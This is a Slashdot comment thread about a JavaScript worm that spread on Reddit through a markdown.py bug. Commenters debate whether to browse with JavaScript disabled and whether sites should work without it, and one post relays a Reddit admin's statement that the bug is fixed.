Anonymous Coward | more than 4 years ago | (#29565083)

Indeed, it will educate people to surf with javascript turned off, and it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

Anyone who believes this has simply never written a web application. Javascript and cookies are absolutely essential to any web programmer who wishes to have any type of dynamic content on a page. It annoys me to no end when someone says the solution to security holes is to turn these features off. The solution is for programmers to stop being idiots and write secure code, both in web applications and in the browsers themselves.

Re:Is this good news or bad? (1, Insightful)

Anonymous Coward | more than 4 years ago | (#29565317)

Anyone who believes this has simply never written a web application. Javascript and cookies are absolutely essential to any web programmer who wishes to have any type of dynamic content on a page. It annoys me to no end when someone says the solution to security holes is to turn these features off.

Wrong. We're not ignorant, we just think that "dynamic content" isn't important or useful.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565497)

Yeah, a full post back for every operation a user may need to do is a much better approach.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565865)

Then perhaps you'd like to head down to your local library, you might find books a bit more appealing than computers...

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29566041)

Wrong. We're not ignorant, we just think that "dynamic content" isn't important or useful.

You've never actually been paid to create a web page, have you? (at least, not in the last five years)

Re:Is this good news or bad? (5, Insightful)

Anonymous Coward | more than 4 years ago | (#29565353)

As a web developer, I beg to differ. There is absolutely no excuse for writing a page that doesn't 'fail gracefully' when javascript isn't present. Let's face it, for every reputable page out there (att.net, youtube.com, etc) there are a hundred others designed by average joe-schmo webprogrammers. And lord only knows if they designed their page securely, and lord only knows if someone has hacked them and injected malicious scripts. I seem to recall hearing a few weeks ago that the majority of malicious scripts were being put into hollywood celebrity gossip sites that people were hitting off their google searches.

For me, the solution is to just whitelist the sites I visit frequently, only allowing scripts/cookies when I know they can be trusted. I'm not saying that you shouldn't design without javascript, but I am saying that you shouldn't assume that everyone visiting your page is going to have it. Besides, how hard is it to write a page that vomits up its contents in a readable form when the javascript doesn't run to position all the css objects? It doesn't have to look pretty, but it should be usable.

Re:Is this good news or bad? (2, Interesting)

lwsimon (724555) | more than 4 years ago | (#29566333)

Amen. I've gotten into the habit of structuring the document, outputting the data into readable form, then using CSS and JS to make it look and behave how I want it to.

There are some pages where "no access without javascript" is acceptable - but they are few and far between. For the most part, you should be able to use Lynx and view the content.

Re:Is this good news or bad? (4, Insightful)

aardvarkjoe (156801) | more than 4 years ago | (#29565507)

The solution is for programmers to stop being idiots

Any proposal that relies on any group of people to not be idiots is doomed to failure.

Re:Is this good news or bad? (1)

slack_justyb (862874) | more than 4 years ago | (#29565561)

The solution is for programmers to stop being idiots and write secure code

Yeah because that mantra has really caught on, especially with Microsoft employees.

Face it, programs are written by people, people are made to f*** up on an epic scale [wikipedia.org], therefore you need to be ready to handle epic f*** ups or just not play ball. Granted you don't get the same dynamic experience but that's the trade off. I'm sure the guy you're quoting understands that.

Re:Is this good news or bad? (3, Insightful)

ultranova (717540) | more than 4 years ago | (#29565585)

Anyone who believes this has simply never written a web application. Javascript and cookies are absolutely essential to any web programmer who wishes to have any type of dynamic content on a page.

So by advising people to disable Javascript, I'm doing my part for killing off "Web Applications" and getting us back to good old Web Pages. Excellent.

Seriously, why would I want "dynamic content" when all that really means is a thousand pauses as more data is fetched? Give me static pages whenever possible. Better yet, give me a single large static page rather than a dozen small pages, so I don't have to wait while the next page is being loaded and rendered.

The solution is for programmers to stop being idiots and write secure code, both in web applications and in the browsers themselves.

The solution is to understand that most web sites are not applications, from the user's point of view, and stop stuffing them full of scripts that do nothing but slow things down.

Re:Is this good news or bad? (1)

k8to (9046) | more than 4 years ago | (#29565805)

Hooray for ultranova.

There's a few rare cases where I actually want a web application. Most of the web applications I view as totally useless or inferior to native applications.

Most web pages aren't even bad web applications, they're just WEB PAGES. Don't require javascript to do amazingly trivial things like.. load the content.

Already fixed. (2, Informative)

complete loony (663508) | more than 4 years ago | (#29565183)

KeyserSosa: Thanks for this (and thanks aedes). I'm going to steal his idea and post here as well. We've fixed a couple of underlying bugs in markdown.py, and will write a blog post for those interested once the dust settles. We've also gone through and deleted the offending comments. This exploit was a good old-fashioned worm, and its only purpose seems to have been to spread (and spread it did). The effect was limited to the site, and no user information was compromised.

So obviously this is no longer spreading.

A Good Idea (5, Insightful)

CopaceticOpus (965603) | more than 4 years ago | (#29565255)

Hey, everyone, there is a javascript exploit on Reddit! Click on these links to Reddit to learn more.

Incidentally, this old sock smells awful. You should smell it.

That's how IT saved the world. (2, Funny)

Thanshin (1188877) | more than 4 years ago | (#29565603)

Can you imagine the same people in other fields of science?

"...Hey guys, look! I made the black hole generator we were theorizing yesterday! See? I just have to press this button and

Re:That's how IT saved the world. (3, Funny)

Idiomatick (976696) | more than 4 years ago | (#29565781)

This is why the engineer engineers make fun of us in software engineering. :(

Re:That's how IT saved the world. (3, Funny)

dotancohen (1015143) | more than 4 years ago | (#29565945)

Can you imagine the same people in other fields of science?

"...Hey guys, look! I made the black hole generator we were theorizing yesterday! See? I just have to press this button and

They keep having problems with that black hole generator, just wait until November. [slashdot.org]

if you read the posts backwards (1)

nimbius (983462) | more than 4 years ago | (#29565709)

it's a bunch of overly-excited people talking about an exploit until it goes away.

Re:if you read the posts backwards (2, Funny)

Neoncow (802085) | more than 4 years ago | (#29566391)

It actually works the same way if you read it forwards.

Oh cool! Now I can... (1)

argent (18001) | more than 4 years ago | (#29566403)

Oh cool, now I can finally create the signature virus!
